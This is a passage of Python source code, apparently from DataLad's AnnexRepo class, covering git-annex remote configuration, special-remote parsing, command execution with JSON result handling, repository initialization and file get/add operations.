Note, that\n # locals() can't be updated.\n s = parsed.get('s')\n S = parsed.get('S')\n C = parsed.get('C')\n\n if S is None and C is None:\n return s # also okay if s is None as well -> no size to report\n elif s is None:\n # s is None, while S and/or C are not.\n raise ValueError(\"invalid key: {}\".format(key))\n elif S and C:\n if C <= int(s / S):\n return S\n else:\n return s % S\n else:\n # S or C are given with the respective other one missing\n raise ValueError(\"invalid key: {}\".format(key))\n\n @normalize_path\n def get_file_size(self, path):\n fpath = opj(self.path, path)\n return 0 if not exists(fpath) else os.stat(fpath).st_size\n\n def is_initialized(self):\n \"\"\"quick check whether this appears to be an annex-init'ed repo\n \"\"\"\n # intended to avoid calling self._init, when it's not needed, since this check is clearly\n # cheaper than git-annex-init (which would be safe to just call)\n\n return (self.dot_git / 'annex').exists()\n\n @borrowdoc(GitRepo, 'is_valid_git')\n def is_valid_annex(self, allow_noninitialized=False, check_git=True):\n\n initialized_annex = (self.is_valid_git() if check_git else True) and (self.dot_git / 'annex').exists()\n\n if allow_noninitialized:\n try:\n return initialized_annex or ((self.is_valid_git() if check_git else True) and self.is_with_annex())\n except (NoSuchPathError, InvalidGitRepositoryError):\n return False\n else:\n return initialized_annex\n\n @classmethod\n def is_valid_repo(cls, path, allow_noninitialized=False):\n \"\"\"Return True if given path points to an annex repository\n \"\"\"\n\n def git_file_has_annex(p):\n \"\"\"Return True if `p` contains a .git file, that points to a git\n dir with a subdir 'annex'\"\"\"\n _git = opj(p, '.git')\n if not os.path.isfile(_git):\n return False\n with open(_git, \"r\") as f:\n line = f.readline()\n if line.startswith(\"gitdir: \"):\n return exists(opj(p, line[8:], 'annex'))\n else:\n lgr.debug(\"Invalid .git file: %s\", _git)\n return False\n\n initialized_annex = GitRepo.is_valid_repo(path) and \\\n (exists(opj(path, '.git', 'annex')) or\n git_file_has_annex(path))\n\n if allow_noninitialized:\n try:\n return initialized_annex or GitRepo(path, create=False, init=False).is_with_annex()\n except (NoSuchPathError, InvalidGitRepositoryError):\n return False\n else:\n return initialized_annex\n\n def set_remote_url(self, name, url, push=False):\n \"\"\"Set the URL a remote is pointing to\n\n Sets the URL of the remote `name`. 
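
A hedged sketch of the fetch/push URL behaviour this method provides (the remote name and URLs are invented; `repo` is assumed to be an AnnexRepo instance):

    # plain fetch URL
    repo.set_remote_url('myserver', 'https://example.com/repo/.git')
    # push URL; as documented below, this additionally sets remote.myserver.annexurl
    repo.set_remote_url('myserver', 'ssh://example.com/srv/repo', push=True)
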
Requires the remote to already exist.\n\n Parameters\n ----------\n name: str\n name of the remote\n url: str\n push: bool\n if True, set the push URL, otherwise the fetch URL;\n if True, additionally set annexurl to `url`, to make sure annex uses\n it to talk to the remote, since access via fetch URL might be\n restricted.\n \"\"\"\n\n if push:\n # if we are to set a push url, also set 'annexUrl' for this remote,\n # in order to make git-annex use it, when talking to the remote.\n # (see http://git-annex.branchable.com/bugs/annex_ignores_pushurl_and_uses_only_url_upon___34__copy_--to__34__/)\n var = 'remote.{0}.{1}'.format(name, 'annexurl')\n self.config.set(var, url, scope='local', reload=True)\n super(AnnexRepo, self).set_remote_url(name, url, push)\n\n def set_remote_dead(self, name):\n \"\"\"Announce to annex that remote is \"dead\"\n \"\"\"\n return self.call_annex([\"dead\", name])\n\n def is_remote_annex_ignored(self, remote):\n \"\"\"Return True if remote is explicitly ignored\"\"\"\n return self.config.getbool(\n 'remote.{}'.format(remote), 'annex-ignore',\n default=False\n )\n\n def is_special_annex_remote(self, remote, check_if_known=True):\n \"\"\"Return whether remote is a special annex remote\n\n Decides based on the presence of an annex- option and lack of a\n configured URL for the remote.\n \"\"\"\n if check_if_known:\n if remote not in self.get_remotes():\n raise RemoteNotAvailableError(remote)\n opts = self.config.options('remote.{}'.format(remote))\n if \"url\" in opts:\n is_special = False\n elif any(o.startswith(\"annex-\") for o in opts\n if o not in [\"annex-uuid\", \"annex-ignore\"]):\n # It's possible that there isn't a special-remote related option\n # (we only filter out a few common ones), but given that there is\n # no URL it should be a good bet that this is a special remote.\n is_special = True\n else:\n is_special = False\n lgr.warning(\"Remote '%s' has no URL or annex- option. \"\n \"Is it mis-configured?\",\n remote)\n return is_special\n\n @borrowkwargs(GitRepo)\n def get_remotes(self,\n with_urls_only=False,\n exclude_special_remotes=False):\n \"\"\"Get known (special-) remotes of the repository\n\n Parameters\n ----------\n exclude_special_remotes: bool, optional\n if True, don't return annex special remotes\n\n Returns\n -------\n remotes : list of str\n List of names of the remotes\n \"\"\"\n remotes = super(AnnexRepo, self).get_remotes(with_urls_only=with_urls_only)\n\n if exclude_special_remotes:\n return [\n remote for remote in remotes\n if not self.is_special_annex_remote(remote, check_if_known=False)\n ]\n else:\n return remotes\n\n def get_special_remotes(self, include_dead:bool = False) -> Dict[str, dict]:\n \"\"\"Get info about all known (not just enabled) special remotes.\n\n The present implementation is not able to report on special remotes\n that have only been configured in a private annex repo\n (annex.private=true).\n\n Parameters\n ----------\n include_dead: bool, optional\n Whether to include remotes announced dead.\n\n Returns\n -------\n dict\n Keys are special remote UUIDs. Each value is a dictionary with\n configuration information git-annex has for the remote. This should\n include the 'type' and 'name' as well as any `initremote` parameters\n that git-annex stores.\n\n Note: This is a faithful translation of git-annex:remote.log with one\n exception. 
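
A sketch combining the remote-inspection helpers above (assuming `repo` is an AnnexRepo instance; the output handling is illustrative only):

    plain_remotes = repo.get_remotes(exclude_special_remotes=True)
    for uuid, cfg in repo.get_special_remotes().items():
        # each value is the enableremote-style configuration git-annex stores
        print(uuid, cfg.get('name'), cfg.get('type'))
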
For a special remote initialized with the --sameas flag,\n git-annex stores the special remote name under the \"sameas-name\" key,\n we copy this value under the \"name\" key so that callers don't have to\n check two places for the name. If you need to detect whether you're\n working with a sameas remote, the presence of either \"sameas-name\" or\n \"sameas-uuid\" is a reliable indicator.\n \"\"\"\n argspec = re.compile(r'^([^=]*)=(.*)$')\n srs = {}\n\n # We provide custom implementation to access this metadata since ATM\n # no git-annex command exposes it on CLI.\n #\n # Information will potentially be obtained from remote.log within\n # git-annex branch, and git-annex's journal, which might exist e.g.\n # due to alwayscommit=false operations\n sources = []\n try:\n sources.append(\n list(\n self.call_git_items_(\n ['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n )\n )\n except CommandError as e:\n if (\n ('Not a valid object name git-annex:remote.log' in e.stderr) or # e.g. git 2.30.2\n (\"fatal: path 'remote.log' does not exist in 'git-annex'\" in e.stderr) # e.g. 2.35.1+next.20220211-1\n ):\n # no special remotes configured - might still be in the journal\n pass\n else:\n # some unforeseen error\n raise e\n\n journal_path = self.dot_git / \"annex\" / \"journal\" / \"remote.log\"\n if journal_path.exists():\n sources.append(journal_path.read_text().splitlines())\n\n for line in chain(*sources):\n # be precise and split by spaces\n fields = line.split(' ')\n # special remote UUID\n sr_id = fields[0]\n # the rest are config args for enableremote\n sr_info = dict(argspec.match(arg).groups()[:2] for arg in fields[1:])\n if \"name\" not in sr_info:\n name = sr_info.get(\"sameas-name\")\n if name is None:\n lgr.warning(\n \"Encountered git-annex remote without a name or \"\n \"sameas-name value: %s\",\n sr_info)\n else:\n sr_info[\"name\"] = name\n srs[sr_id] = sr_info\n\n # remove dead ones\n if not include_dead:\n # code largely copied from drop.py:_detect_nondead_annex_at_remotes\n # but not using -p and rather blob as above\n try:\n for line in self.call_git_items_(\n ['cat-file', 'blob', 'git-annex:trust.log']):\n columns = line.split()\n if columns[1] == 'X':\n # .pop if present\n srs.pop(columns[0], None)\n except CommandError as e:\n # this is not a problem per-se, probably file is not there, just log\n CapturedException(e)\n return srs\n\n def _call_annex(self, args, files=None, jobs=None, protocol=StdOutErrCapture,\n git_options=None, stdin=None, merge_annex_branches=True,\n **kwargs):\n \"\"\"Internal helper to run git-annex commands\n\n Standard command options are applied in addition to the given arguments,\n and certain error conditions are detected (if possible) and dedicated\n exceptions are raised.\n\n Parameters\n ----------\n args: list\n List of git-annex command arguments.\n files: list, optional\n If command passes list of files. If list is too long\n (by number of files or overall size) it will be split, and multiple\n command invocations will follow\n jobs : int or 'auto', optional\n If 'auto', the number of jobs will be determined automatically,\n informed by the configuration setting\n 'datalad.runtime.max-annex-jobs'.\n protocol : WitlessProtocol, optional\n Protocol class to pass to GitWitlessRunner.run(). 
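
Internal-API sketch only (downstream code would normally use the public call_annex* wrappers further below); `whereis` is a standard git-annex subcommand, the file name is invented, and `repo` is assumed to be an AnnexRepo instance:

    from datalad.cmd import StdOutErrCapture

    out = repo._call_annex(['whereis'], files=['data.bin'],
                           protocol=StdOutErrCapture)
    print(out['stdout'])
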
By default this is\n StdOutErrCapture, which will provide default logging behavior and\n guarantee that stdout/stderr are included in potential CommandError\n exception.\n git_options: list, optional\n Additional arguments for Git to include in the git-annex call\n (in a position prior to the 'annex' subcommand.\n stdin: File-like, optional\n stdin to connect to the git-annex process. Only used when `files`\n is None.\n merge_annex_branches: bool, optional\n If False, annex.merge-annex-branches=false config will be set for\n git-annex call. Useful for operations which are not intended to\n benefit from updating information about remote git-annexes\n **kwargs:\n Additional arguments are passed on to the WitlessProtocol constructor\n\n Returns\n -------\n dict\n Return value of WitlessRunner.run(). The content of the dict is\n determined by the given `protocol`. By default, it provides git-annex's\n stdout and stderr (under these key names)\n\n Raises\n ------\n CommandError\n If the call exits with a non-zero status.\n\n OutOfSpaceError\n If a corresponding statement was detected in git-annex's output on\n stderr. Only supported if the given protocol captured stderr.\n\n RemoteNotAvailableError\n If a corresponding statement was detected in git-annex's output on\n stderr. Only supported if the given protocol captured stderr.\n \"\"\"\n if self.git_annex_version is None:\n self._check_git_annex_version()\n\n # git portion of the command\n cmd = ['git'] + self._ANNEX_GIT_COMMON_OPTIONS\n\n if git_options:\n cmd += git_options\n\n if not self.always_commit:\n cmd += ['-c', 'annex.alwayscommit=false']\n\n if not merge_annex_branches:\n cmd += ['-c', 'annex.merge-annex-branches=false']\n\n # annex portion of the command\n cmd.append('annex')\n cmd += args\n\n if lgr.getEffectiveLevel() <= 8:\n cmd.append('--debug')\n\n if self._annex_common_options:\n cmd += self._annex_common_options\n\n if jobs == 'auto':\n # Limit to # of CPUs (but at least 3 to start with)\n # and also an additional config constraint (by default 1\n # due to https://github.com/datalad/datalad/issues/4404)\n jobs = self._n_auto_jobs or min(\n self.config.obtain('datalad.runtime.max-annex-jobs'),\n max(3, cpu_count()))\n # cache result to avoid repeated calls to cpu_count()\n self._n_auto_jobs = jobs\n if jobs and jobs != 1:\n cmd.append('-J%d' % jobs)\n\n runner = self._git_runner\n env = None\n if self.fake_dates_enabled:\n env = self.add_fake_dates(runner.env)\n\n try:\n if files:\n if issubclass(protocol, GeneratorMixIn):\n return runner.run_on_filelist_chunks_items_(\n cmd,\n files,\n protocol=protocol,\n env=env,\n **kwargs)\n else:\n return runner.run_on_filelist_chunks(\n cmd,\n files,\n protocol=protocol,\n env=env,\n **kwargs)\n else:\n return runner.run(\n cmd,\n stdin=stdin,\n protocol=protocol,\n env=env,\n **kwargs)\n except CommandError as e:\n # Note: A call might result in several 'failures', that can be or\n # cannot be handled here. Detection of something, we can deal with,\n # doesn't mean there's nothing else to deal with.\n\n # OutOfSpaceError:\n # Note:\n # doesn't depend on anything in stdout. 
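
The 'auto' jobs computation above reduces to the following standalone sketch; the value 1 stands in for the datalad.runtime.max-annex-jobs default mentioned in the comment, so this is an illustration rather than the actual configuration lookup:

    from multiprocessing import cpu_count

    max_annex_jobs = 1  # stand-in for config.obtain('datalad.runtime.max-annex-jobs')
    jobs = min(max_annex_jobs, max(3, cpu_count()))
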
Therefore check this before\n # dealing with stdout\n out_of_space_re = re.search(\n \"not enough free space, need (.*) more\", e.stderr\n )\n if out_of_space_re:\n raise OutOfSpaceError(cmd=['annex'] + args,\n sizemore_msg=out_of_space_re.groups()[0])\n\n # RemoteNotAvailableError:\n remote_na_re = re.search(\n \"there is no available git remote named \\\"(.*)\\\"\", e.stderr\n )\n if remote_na_re:\n raise RemoteNotAvailableError(cmd=['annex'] + args,\n remote=remote_na_re.groups()[0])\n\n # TEMP: Workaround for git-annex bug, where it reports success=True\n # for annex add, while simultaneously complaining, that it is in\n # a submodule:\n # TODO: For now just reraise. But independently on this bug, it\n # makes sense to have an exception for that case\n in_subm_re = re.search(\n \"fatal: Pathspec '(.*)' is in submodule '(.*)'\", e.stderr\n )\n if in_subm_re:\n raise e\n\n # we don't know how to handle this, just pass it on\n raise\n\n def _call_annex_records(self, args, files=None, jobs=None,\n git_options=None,\n stdin=None,\n merge_annex_branches=True,\n progress=False,\n **kwargs):\n \"\"\"Internal helper to run git-annex commands with JSON result processing\n\n `_call_annex()` is used for git-annex command execution, using\n AnnexJsonProtocol.\n\n Parameters\n ----------\n args: list\n See `_call_annex()` for details.\n files: list, optional\n See `_call_annex()` for details.\n jobs : int or 'auto', optional\n See `_call_annex()` for details.\n git_options: list, optional\n See `_call_annex()` for details.\n stdin: File-like, optional\n See `_call_annex()` for details.\n merge_annex_branches: bool, optional\n See `_call_annex()` for details.\n **kwargs:\n Additional arguments are passed on to the AnnexJsonProtocol constructor\n\n Returns\n -------\n list(dict)\n List of parsed result records.\n\n Raises\n ------\n CommandError\n See `_call_annex()` for details.\n OutOfSpaceError\n See `_call_annex()` for details.\n RemoteNotAvailableError\n See `_call_annex()` for details.\n RuntimeError\n Output from the git-annex process was captured, but no structured\n records could be parsed.\n \"\"\"\n protocol = AnnexJsonProtocol\n\n args = args[:] + ['--json', '--json-error-messages']\n if progress:\n args += ['--json-progress']\n\n out = None\n try:\n out = self._call_annex(\n args,\n files=files,\n jobs=jobs,\n protocol=protocol,\n git_options=git_options,\n stdin=stdin,\n merge_annex_branches=merge_annex_branches,\n **kwargs,\n )\n except CommandError as e:\n not_existing = None\n if e.kwargs.get('stdout_json'):\n # See if may be it was within stdout_json, as e.g. 
was added around\n # 10.20230407-99-gbe36e208c2 to 'add' together with\n # 'message-id': 'FileNotFound'\n out = {'stdout_json': e.kwargs.get('stdout_json', [])}\n not_existing = []\n for j in out['stdout_json']:\n if j.get('message-id') == 'FileNotFound':\n not_existing.append(j['file'])\n # for consistency with our \"_fake_json_for_non_existing\" records\n # but not overloading one if there is one\n j.setdefault('note', 'not found')\n\n if not not_existing:\n # Workaround for not existing files as long as older annex doesn't\n # report it within JSON.\n # see http://git-annex.branchable.com/bugs/copy_does_not_reflect_some_failed_copies_in_--json_output/\n not_existing = _get_non_existing_from_annex_output(e.stderr)\n if not_existing:\n if not out:\n out = {'stdout_json': []}\n out['stdout_json'].extend(_fake_json_for_non_existing(not_existing, args[0]))\n\n # Note: insert additional code here to analyse failure and possibly\n # raise a custom exception\n\n # If it was not about non-existing but running failed -- re-raise\n if not not_existing:\n raise e\n\n #if e.stderr:\n # # else just warn about present errors\n # shorten = lambda x: x[:1000] + '...' if len(x) > 1000 else x\n\n # _log = lgr.debug if kwargs.get('expect_fail', False) else lgr.warning\n # _log(\n # \"Running %s resulted in stderr output: %s\",\n # args, shorten(e.stderr)\n # )\n\n # git-annex fails to non-zero exit when reporting an error on\n # non-existing paths in some versions and/or commands.\n # Hence, check for it on non-failure, too. This became apparent with\n # annex 10.20220222, but was a somewhat \"hidden\" issue for longer.\n #\n # Note, that this may become unnecessary after annex'\n # ce91f10132805d11448896304821b0aa9c6d9845 (Feb 28, 2022)\n # \"fix annex.skipunknown false error propagation\"\n if 'stderr' in out:\n not_existing = _get_non_existing_from_annex_output(out['stderr'])\n if not_existing:\n if out is None:\n out = {'stdout_json': []}\n out['stdout_json'].extend(\n _fake_json_for_non_existing(not_existing, args[0])\n )\n\n json_objects = out.pop('stdout_json')\n\n if out.get('stdout'):\n if json_objects:\n # We at least received some valid json output, so warn about\n # non-json output and continue.\n lgr.warning(\"Received non-json lines for --json command: %s\",\n out)\n else:\n raise RuntimeError(\n \"Received no json output for --json command, only:\\n{}\"\n .format(out))\n\n # A special remote might send a message via \"info\". This is supposed\n # to be printed by annex but in case of\n # `--json` is returned by annex as \"{'info': '<message>'}\". See\n # https://git-annex.branchable.com/design/external_special_remote_protocol/#index5h2\n #\n # So, Ben thinks we should just spit it out here, since everything\n # calling _call_annex_records is concerned with the actual results\n # being returned. 
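
To illustrate the info-record filtering performed just below, with entirely made-up records:

    json_objects = [
        {'info': 'progress note emitted by a special remote'},
        {'command': 'add', 'file': 'data.bin', 'success': True,
         'key': 'MD5E-s3--0123456789abcdef0123456789abcdef.bin'},
    ]
    # info-only records are logged, everything else is returned to the caller
    return_objects = [o for o in json_objects
                      if not (len(o) == 1 and o.get('info'))]
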
Moreover, this kind of response is special to\n # particular special remotes rather than particular annex commands.\n # So, likely there's nothing callers could do about it other than\n # spitting it out.\n return_objects = []\n for obj in json_objects:\n if len(obj.keys()) == 1 and obj['info']:\n lgr.info(obj['info'])\n else:\n return_objects.append(obj)\n\n return return_objects\n\n def _call_annex_records_items_(self,\n args,\n files=None,\n jobs=None,\n git_options=None,\n stdin=None,\n merge_annex_branches=True,\n progress=False,\n **kwargs):\n \"\"\"Yielding git-annex command execution with JSON result processing\n\n `_call_annex()` is used for git-annex command execution, using\n GeneratorAnnexJsonProtocol. This means _call_annex() will yield\n results as soon as they are available.\n\n For a description of the parameters and raised exceptions, please\n refer to _call_annex_records().\n\n Returns\n -------\n Generator(something)\n list(dict)\n List of parsed result records.\n \"\"\"\n protocol_class = GeneratorAnnexJsonProtocol\n\n args = args[:] + ['--json', '--json-error-messages']\n if progress:\n args += ['--json-progress']\n\n json_objects_received = False\n try:\n for json_object in self._call_annex(\n args,\n files=files,\n jobs=jobs,\n protocol=protocol_class,\n git_options=git_options,\n stdin=stdin,\n merge_annex_branches=merge_annex_branches,\n **kwargs):\n if len(json_object) == 1 and json_object.get('info', None):\n lgr.info(json_object['info'])\n else:\n json_objects_received = True\n yield json_object\n\n except CommandError as e:\n # Note: Workaround for not existing files as long as annex doesn't\n # report it within JSON response:\n # see http://git-annex.branchable.com/bugs/copy_does_not_reflect_some_failed_copies_in_--json_output/\n not_existing = _get_non_existing_from_annex_output(e.stderr)\n yield from _fake_json_for_non_existing(not_existing, args[0])\n\n # Note: insert additional code here to analyse failure and possibly\n # raise a custom exception\n\n # if we didn't raise before, just depend on whether or not we seem\n # to have some json to return. It should contain information on\n # failure in keys 'success' and 'note'\n # TODO: This is not entirely true. 'annex status' may return empty,\n # while there was a 'fatal:...' in stderr, which should be a\n # failure/exception\n # Or if we had empty stdout but there was stderr\n if json_objects_received is False and e.stderr:\n raise e\n\n # In contrast to _call_annex_records, this method does not warn about\n # additional non-JSON data on stdout, nor does is raise a RuntimeError\n # if only non-JSON data was received on stdout.\n return\n\n def call_annex_records(self, args, files=None):\n \"\"\"Call annex with `--json*` to request structured result records\n\n This method behaves like `call_annex()`, but returns parsed result\n records.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n\n Returns\n -------\n list(dict)\n List of parsed result records.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status. 
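
A hedged usage sketch for this method (the subcommand is a standard git-annex one, the file name is invented, and `repo` is assumed to be an AnnexRepo instance):

    for rec in repo.call_annex_records(['whereis'], files=['data.bin']):
        print(rec.get('file'), rec.get('success'))
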
All result\n records captured until the non-zero exit are available in the\n exception's `kwargs`-dict attribute under key 'stdout_json'.\n\n See `_call_annex()` for more information on Exceptions.\n \"\"\"\n return self._call_annex_records(args, files=files)\n\n def call_annex(self, args, files=None):\n \"\"\"Call annex and return standard output.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n\n Returns\n -------\n standard output (str)\n\n Raises\n ------\n See `_call_annex()` for information on Exceptions.\n \"\"\"\n return self._call_annex(\n args,\n files=files,\n protocol=StdOutErrCapture)['stdout']\n\n def call_annex_success(self, args, files=None):\n \"\"\"Call git-annex and return true if the call exit code of 0.\n\n All parameters match those described for `call_annex`.\n\n Returns\n -------\n bool\n \"\"\"\n try:\n self.call_annex(args, files)\n except CommandError:\n return False\n return True\n\n def call_annex_items_(self, args, files=None, sep=None):\n \"\"\"Call git-annex, splitting output on `sep`.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `git-annex`.\n files : list of str, optional\n File arguments to pass to `annex`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n sep : str, optional\n Split the output by `str.split(sep)` rather than `str.splitlines`.\n\n Returns\n -------\n Generator that yields output items.\n\n Raises\n ------\n See `_call_annex()` for information on Exceptions.\n \"\"\"\n class GeneratorStdOutErrCapture(GeneratorMixIn,\n AssemblingDecoderMixIn,\n StdOutErrCapture):\n def __init__(self):\n GeneratorMixIn.__init__(self)\n AssemblingDecoderMixIn.__init__(self)\n StdOutErrCapture.__init__(self)\n\n def pipe_data_received(self, fd, data):\n if fd == 1:\n self.send_result(\n (\"stdout\", self.decode(fd, data, self.encoding)))\n return\n super().pipe_data_received(fd, data)\n\n line_splitter = LineSplitter(separator=sep)\n for source, content in self._call_annex(\n args,\n files=files,\n protocol=GeneratorStdOutErrCapture):\n\n if source == \"stdout\":\n yield from line_splitter.process(content)\n\n remaining_content = line_splitter.finish_processing()\n if remaining_content is not None:\n yield remaining_content\n\n def call_annex_oneline(self, args, files=None):\n \"\"\"Call annex for a single line of output.\n\n This method filters prior output line selection to exclude git-annex\n status output that is triggered by command execution, but is not\n related to the particular command. This includes lines like:\n\n (merging ... into git-annex)\n (recording state ...)\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `annex`.\n files : list of str, optional\n File arguments to pass to `annex`. 
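
A sketch of the plain-output variants defined above (the subcommands are standard git-annex ones, the file path is invented, and `repo` is assumed to be an AnnexRepo instance):

    text = repo.call_annex(['info', '--fast'])                            # full stdout as one string
    ok = repo.call_annex_success(['fsck', '--fast'], files=['data.bin'])  # True on zero exit
    wanted = repo.call_annex_oneline(['wanted', 'here'])                  # single-line queries
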
The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n\n Returns\n -------\n str\n Either a single output line, or an empty string if there was no\n output.\n Raises\n ------\n AssertionError if there is more than one line of output.\n\n See `_call_annex()` for information on Exceptions.\n \"\"\"\n # ignore some lines\n # see https://git-annex.branchable.com/todo/output_of_wanted___40__and_possibly_group_etc__41___should_not_be_polluted_with___34__informational__34___messages/\n # that links claims it is fixed, but '(recording state in git...)'\n # still appear as of 8.20201103-1\n lines = [\n l for l in self.call_annex_items_(args, files=files)\n if l and not re.search(\n r'\\((merging .* into git-annex|recording state ).*\\.\\.\\.\\)', l\n )\n ]\n\n if len(lines) > 1:\n raise AssertionError(\n \"Expected {} to return single line, but it returned {}\"\n .format([\"git\", 'annex'] + args, lines))\n return lines[0] if lines else ''\n\n def _is_direct_mode_from_config(self):\n \"\"\"Figure out if in direct mode from the git config.\n\n Since relies on reading config, expensive to be used often\n\n Returns\n -------\n True if in direct mode, False otherwise.\n \"\"\"\n # If .git/config lacks an entry \"direct\",\n # it's actually indirect mode.\n self.config.reload()\n return self.config.getbool(\"annex\", \"direct\", False)\n\n def is_direct_mode(self):\n \"\"\"Return True if annex is in direct mode\n\n Returns\n -------\n True if in direct mode, False otherwise.\n \"\"\"\n self._direct_mode = None\n\n if self._direct_mode is None:\n # we need to figure it out\n self._direct_mode = self._is_direct_mode_from_config()\n return self._direct_mode\n\n def is_crippled_fs(self):\n \"\"\"Return True if git-annex considers current filesystem 'crippled'.\n\n Returns\n -------\n True if on crippled filesystem, False otherwise\n \"\"\"\n\n self.config.reload()\n return self.config.getbool(\"annex\", \"crippledfilesystem\", False)\n\n @property\n def supports_unlocked_pointers(self):\n \"\"\"Return True if repository version supports unlocked pointers.\n \"\"\"\n try:\n return self.config.getint(\"annex\", \"version\") >= 6\n except KeyError:\n # If annex.version isn't set (e.g., an uninitialized repo), assume\n # that unlocked pointers are supported given that they are with the\n # minimum git-annex version.\n return True\n\n def _init(self, version=None, description=None):\n \"\"\"Initializes an annex repository.\n\n Note: This is intended for private use in this class by now.\n If you have an object of this class already,\n there shouldn't be a need to 'init' again.\n\n \"\"\"\n # MIH: this function is required for re-initing repos. 
The logic\n # in the constructor is rather convoluted and doesn't acknowledge\n # the case of a perfectly healthy annex that just needs a new\n # description\n # will keep leading underscore in the name for know, but this is\n # not private\n # TODO: provide git and git-annex options.\n opts = []\n if description is not None:\n opts += [description]\n if version is not None:\n version = str(version)\n supported_versions = AnnexRepo.check_repository_versions()['supported']\n if version not in supported_versions:\n first_supported_version = int(supported_versions[0])\n if int(version) < first_supported_version:\n lgr.info(\"Annex repository version %s will be upgraded to %s or later version\",\n version, first_supported_version)\n # and if it is higher than any supported -- we will just let git-annex to do\n # what it wants to do\n opts += ['--version', '{0}'.format(version)]\n\n # TODO: RM DIRECT? or RF at least ?\n # Note: git-annex-init kills a possible tracking branch for\n # 'annex/direct/my_branch', if we just cloned from a repo in direct\n # mode. We want to preserve the information about the tracking branch,\n # as if the source repo wasn't in direct mode.\n # Note 2: Actually we do it for all 'managed branches'. This might turn\n # out to not be necessary\n sections_to_preserve = [\"branch.{}\".format(branch)\n for branch in self.get_branches()\n if self.is_managed_branch(branch)\n and \"branch.{}\".format(branch) in\n self.config.sections()]\n for sct in sections_to_preserve:\n orig_branch = sct[7:]\n new_branch = \\\n self.get_corresponding_branch(orig_branch) or orig_branch\n new_section = \"branch.{}\".format(new_branch)\n for opt in self.config.options(sct):\n orig_value = self.config.get_value(sct, opt)\n new_value = orig_value.replace(orig_branch, new_branch)\n self.config.add(var=new_section + \".\" + opt,\n value=new_value,\n scope='local',\n reload=False)\n self._call_annex(['init'] + opts, protocol=AnnexInitOutput)\n # TODO: When to expect stderr?\n # on crippled filesystem for example (think so)?\n self.config.reload()\n\n @normalize_paths\n def get(self, files, remote=None, options=None, jobs=None, key=False):\n \"\"\"Get the actual content of files\n\n Parameters\n ----------\n files : list of str\n paths to get\n remote : str, optional\n from which remote to fetch content\n options : list of str, optional\n commandline options for the git annex get command\n jobs : int or None, optional\n how many jobs to run in parallel (passed to git-annex call).\n If not specified (None), then\n key : bool, optional\n If provided file value is actually a key\n\n Returns\n -------\n files : list of dict\n \"\"\"\n options = options[:] if options else []\n\n if self.config.get(\"annex.retry\") is None:\n options.extend(\n [\"-c\",\n \"annex.retry={}\".format(\n self.config.obtain(\"datalad.annex.retry\"))])\n\n if remote:\n if remote not in self.get_remotes():\n raise RemoteNotAvailableError(\n remote=remote,\n cmd=\"annex get\",\n msg=\"Remote is not known. 
Known are: %s\"\n % (self.get_remotes(),)\n )\n self._maybe_open_ssh_connection(remote)\n options += ['--from', remote]\n\n # analyze provided files to decide which actually are needed to be\n # fetched\n\n if not key:\n expected_downloads, fetch_files = self._get_expected_files(\n files, ['--not', '--in', '.'],\n merge_annex_branches=False # interested only in local info\n )\n else:\n fetch_files = files\n assert len(files) == 1, \"When key=True only a single file be provided\"\n expected_downloads = {files[0]: AnnexRepo.get_size_from_key(files[0])}\n\n if not fetch_files:\n lgr.debug(\"No files found needing fetching.\")\n return []\n\n if len(fetch_files) != len(files):\n lgr.debug(\"Actually getting %d files\", len(fetch_files))\n\n # TODO: provide more meaningful message (possibly aggregating 'note'\n # from annex failed ones\n # TODO: reproduce DK's bug on OSX, and either switch to\n # --batch mode (I don't think we have --progress support in long\n # alive batch processes ATM),\n if key:\n cmd = ['get'] + options + ['--key'] + files\n files_arg = None\n else:\n cmd = ['get'] + options\n files_arg = files\n results = self._call_annex_records(\n cmd,\n # TODO: eventually make use of --batch mode\n files=files_arg,\n jobs=jobs,\n progress=True,\n # filter(bool, to avoid trying to add up None's when size is not known\n total_nbytes=sum(filter(bool, expected_downloads.values())),\n )\n results_list = list(results)\n # TODO: should we here compare fetch_files against result_list\n # and vomit an exception of incomplete download????\n return results_list\n\n def _get_expected_files(self, files, expr, merge_annex_branches=True):\n \"\"\"Given a list of files, figure out what to be downloaded\n\n Parameters\n ----------\n files\n expr: list\n Expression to be passed into annex's find\n\n Returns\n -------\n expected_files : dict\n key -> size\n fetch_files : list\n files to be fetched\n \"\"\"\n lgr.debug(\"Determine what files match the query to work with\")\n # Let's figure out first which files/keys and of what size to download\n expected_files = {}\n fetch_files = []\n keys_seen = set()\n unknown_sizes = [] # unused atm\n # for now just record total size, and\n for j in self._call_annex_records(\n ['find'] + expr, files=files,\n merge_annex_branches=merge_annex_branches\n ):\n # TODO: some files might not even be here. So in current fancy\n # output reporting scheme we should then theoretically handle\n # those cases here and say 'impossible' or something like that\n if not j.get('success', True):\n # TODO: I guess do something with yielding and filtering for\n # what need to be done and what not\n continue\n key = j['key']\n size = j.get('bytesize')\n if key in keys_seen:\n # multiple files could point to the same key. no need to\n # request multiple times\n continue\n keys_seen.add(key)\n assert j['file']\n fetch_files.append(j['file'])\n if size and size.isdigit():\n expected_files[key] = int(size)\n else:\n expected_files[key] = None\n unknown_sizes.append(j['file'])\n return expected_files, fetch_files\n\n @normalize_paths\n def add(self, files, git=None, backend=None, options=None, jobs=None,\n git_options=None, annex_options=None, update=False):\n \"\"\"Add file(s) to the repository.\n\n Parameters\n ----------\n files: list of str\n list of paths to add to the annex\n git: bool\n if True, add to git instead of annex.\n backend:\n options:\n update: bool\n --update option for git-add. From git's manpage:\n Update the index just where it already has an entry matching\n <pathspec>. 
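
A hedged sketch of the annex-vs-git routing this method provides (paths are invented; `repo` is assumed to be an AnnexRepo instance):

    repo.add(['data/raw.dat'])                 # annexed, unless .gitattributes says otherwise
    repo.add(['code/analysis.py'], git=True)   # added to git directly instead of the annex
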
